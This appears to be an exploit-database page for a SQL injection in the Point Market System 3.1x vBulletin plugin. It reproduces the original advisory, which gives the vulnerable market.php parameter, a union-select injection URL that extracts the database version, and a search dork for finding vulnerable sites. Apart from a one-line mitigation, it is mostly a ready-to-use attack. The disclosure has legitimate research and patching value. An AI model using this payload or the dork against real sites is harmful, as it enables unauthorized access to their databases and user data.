header-logo
Suggest Exploit
vendor:
Point Market System
by:
Net.Edit0r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Point Market System
Affected Version From: 3.1x
Affected Version To: 3.1x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

Point Market System 3.1x vbulletin plugin SQL Injection Vulnerability

The security problem in the file 'market.Php' has been created. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'market.php' file. An example of a malicious query is '-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--'

Mitigation:

The security problem can be mitigated by removing the vulnerable plugin or by patching the vulnerable file.
Source

Exploit-DB raw data:

#(+)Exploit Title: Point Market System 3.1x vbulletin plugin SQL
Injection Vulnerability
#(+)Author   : Net.Edit0r
#(+) E-mail  : Black.hat.tm@Gmail.com
#(+) dork    : intext:Point Market System 3.1x
#(+) Versian : [3.1x]
#(+) Category : Web Apps [SQl]
#(+) Platform : Tested on: linux
#(+) Download plugin : http://www.megaupload.com/?d=2R592KO0

____________________________________________________________________
____________________________________________________________________

You must register on the site !

The security problem in the file "market.Php" has been created. You
can disable this security problem Plagn take it away.

[~] Vulnerable File :

#      [+]http://localhost.com/market.php?do=cat&id=[SQL]

[~] SQL injection Vulnerability
	
#      [+]-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--

#      [+]http://localhost.com/market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--

[~] Demo Vedio :

Vedio : http://www.multiupload.com/S28Z2FCZQD

[~] Full Info plugin Point Market

http://www.vbulletin.org/forum/showthread.php?p=2159503#post2159503

____________________________________________________________________
____________________________________________________________________

########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & D3adly #BHG
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ Virangar ~ S3cR3T ~ M4hd1
~ Mikili ~ P0W3RFU7 ~  Ali.Erroor and all Friends
(+)Gr33ts to : All Iranian HackerZ
########################################################################

Navigation

Suggest Exploit

Services By CQR